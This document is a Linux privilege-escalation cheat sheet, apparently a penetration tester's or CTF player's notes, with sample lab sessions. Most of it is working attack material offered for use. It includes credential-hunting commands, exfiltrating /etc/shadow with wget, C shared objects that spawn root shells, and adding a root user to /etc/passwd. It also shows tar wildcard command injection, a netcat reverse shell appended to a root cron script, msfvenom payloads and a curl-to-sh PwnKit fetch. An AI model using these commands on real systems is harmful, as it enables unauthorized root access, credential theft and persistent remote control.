Linux Privesc

Privilege Escalation

Sensitive Information

find / -writable -type d 2>/dev/null
find / -name authorized_keys 2>/dev/null
find / -name id_rsa 2>/dev/null
find / -name local.txt 2>/dev/null
grep --color=always -rnwi '.' -e "Password" 2>/dev/null
grep -r "password" / 2>/dev/null
grep -r "pass" . 2>/dev/null
history | head -n 20
strings /var/log/auth* | grep -i pass
cat configuration.php | grep --color=always -E "(public|private|true|false|[0-9]+|'.*?')|$"

Sudo

sudo -l
cat /etc/sudoers
sudo -V
(ALL : ALL) ALL = sudo -i # Insta root

# Breakout
sudo vim -c '!sh'
:!bash

# Intended Functionality
sudo -l
sudo apache2 -f /etc/shadow
sudo wget --post-file=/etc/shadow IP:PORT

# Makefile
(ALL) /usr/bin/make install -C /home/profiler/php-spx
vim makefile # SHELL=/tmp/shell

# Sudoers
echo "user ALL=(root) NOPASSWD: ALL" > /etc/sudoers

# LD_PRELOAD
# LD_PRELOAD and LD_LIBRARY_PATH are both inherited from the user's environment.
# LD_PRELOAD loads a shared object before any others when a program is run.
vim shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

# Compile
gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so apache2
id

SUID

# Find all the SUID/SGID executables
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

find / -perm -u=s -type f 2>/dev/null
cat /usr/local/bin/redis-status | strings
# gtfobins

Capabilities

# Similar to SUID, but are more secure
# Look for the cap_setuid capability. +ep means full privileges
# Look for binaries like tar, openssl, and perl, can grant file read or actions

getcap -r / 2>/dev/null
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

SUID / SGID Executables - Shared Object Injection

user@debian:~$ /usr/local/bin/suid-so # Displays a process bar
strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
# Tries to load the libcalc.so shared object within the home dir, but cannot be found.
mkdir /home/user/.config

# Spawn a bash shell:
user@debian:~$ cat /home/user/tools/suid/libcalc.c
#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
	setuid(0);
	system("/bin/bash -p");
}

# Compile the code into a shared object at the location the suid-so was looking for it:
user@debian:~$ gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.c
user@debian:~$ /usr/local/bin/suid-so
Calculating something, please wait...
bash-4.1# id
uid=0(root)

SUID / SGID Executables - Environment Variables

/usr/local/bin/suid-env # Using strings, it seems to start a webserver but doesn’t specify /usr/sbin/service.

# Exploit: create fake service binary that spawns a shell (e.g., Bash).
user@debian:~$ cat /home/user/tools/suid/service.c
int main() {
	setuid(0);
	system("/bin/bash -p");
}

# Compile & Prepend current dir to PATH
user@debian:~$ gcc -o service /home/user/tools/suid/service.c
user@debian:~$ PATH=.:$PATH /usr/local/bin/suid-env
root@debian:~#

Scheduled Tasks

# Frequent tasks running as root is of interest
cat /etc/crontab
crontab -l
grep "CRON" /var/log/syslog
cat /var/log/cron.log
# Systemd Timers
systemctl list-timers --all

# Exploit
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/cron.sh
chmod +x /home/user/cron.sh
ls -la /tmp # -rwsr-sr-x
# Invoke subshell with -p, will have the priv of the user the file is owned by
/tmp/bash -p
id

# Cron Wildcard - Takes all files in the folder as a wildcard
(ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *

echo -e '#!/bin/bash\n/bin/bash' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

james@blaze:~$ sudo /usr/bin/tar -czvf /tmp/backup.tar.gz *
local.txt
shell.sh
root@blaze:/home/james

# Ruby
echo 'exec "/bin/sh"' >> /opt/cron.rb

Path Environment Variable

user@debian:~$ cat /etc/crontab
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # Note that the path variable starts with current home directory (/home/user)
* * * * * root overwrite.sh

# Create a file called overwrite.sh in your home directory with:
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

user@debian:~$ vim overwrite.sh
user@debian:~$ chmod +x /home/user/overwrite.sh
user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root)

Groups

# The disk group allows access to all the data on the machine
$ groups dora
dora : dora disk

$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/ubuntu--vg-ubuntu--lv 9.8G 5.1G 4.3G 55% /
udev 947M 0 947M 0% /dev

$ debugfs /dev/mapper/ubuntu--vg-ubuntu--lv
debugfs 1.45.5 (07-Jan-2020)
debugfs: cd /root
debugfs: ls
131076 (12) . 2 (12) .. 265478 (12) .ssh 265574 (12) snap
131077 (16) .bashrc 131078 (16) .profile 142303 (24) .bash_history
265709 (16) .cache 265469 (36) .local 132363 (20) proof.txt
cat proof.txt

Kernel

cat /etc/issue
uname -r
arch

# DirtyCow
gcc -pthread /home/user/c0w.c -o c0w
./c0w
passwd
id

# Example - https://www.exploit-db.com/exploits/50808
gcc exploit.c -o exploit
./exploit /SUID_file
# id
uid=0(root) gid=0(root) groups=0(root)

/etc/passwd

openssl passwd w00t
echo "qais:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
su qais

# /etc/shadow
# Copy root password from shadow and crack it with john

ls -la /etc/shadow
-rw-r--rw- 1 root shadow 845 Jul 20 17:50 /etc/shadow
mkpasswd -m sha-512 toor
vim /etc/shadow

Docker

# Locate the binary
which docker

# Check its permissions
ls -l /usr/bin/docker
docker images

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
docker run -v /:/mnt --rm -it bash chroot /mnt bash
whoami

Processes

GitHub - DominicBreuker/pspy: Monitor linux processes without root permissionsGitHub

# Law Example
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
./pspy32
2024/11/18 15:27:01 CMD: UID=0     PID=2997   | /bin/bash /var/www/cleanup.sh
2024/11/18 15:27:01 CMD: UID=0     PID=2998   |
2024/11/18 15:27:01 CMD: UID=0     PID=2999   | /bin/bash /var/www/cleanup.sh

# UID=0 = root

echo "/usr/bin/nc 192.168.45.206 4444 -e /usr/bin/bash" >> /var/www/cleanup.sh

Linux Path Hijacking

echo $PATH
# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
# pspy32, ls -la, -rwxr-xr-x

msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=443 -f elf -o target-file
wget -O /fullpath http://192.168.42.123/target-file
chmod +x /tmp/target-file
export PATH=/tmp:$PATH
nc -lvnp 443

#!/bin/bash
/usr/bin/chmod u+s /bin/bash
/usr/bin/echo Done

chmod +x file
export PATH=/home/user:$PATH # Change PATH to point to target file
./SUID_file # Invoke the SUID then run bash -p to get root

PwnKit

prudence@blackgate:/tmp$ sh -c "$(curl -fsSL
https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
root@blackgate:/tmp

NFS Root Squashing

# The option that disables root squashing is "no_root_squash"

# Check the NFS share configuration
cat /etc/exports # Noted the /tmp share has root squashing disabled.

# Generate payload & save it to the target share
┌──(root㉿kali)
└─# mkdir /tmp/nfs

┌──(root㉿kali)
└─# mount -o rw,vers=3 10.10.206.51:/tmp /tmp/nfs
Created symlink '/run/systemd/system/remote-fs.target.wants/rpc-statd.service' → '/usr/lib/systemd/system/rpc-statd.service'.

┌──(root㉿kali)
└─# msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

# Make the file executable and set the SUID permission:
┌──(root㉿kali)
└─# chmod +xs /tmp/nfs/shell.elf

# Back on the target, execute the file to gain a root shell
user@debian:~$ /tmp/shell.elf
bash-4.1# whoami 
root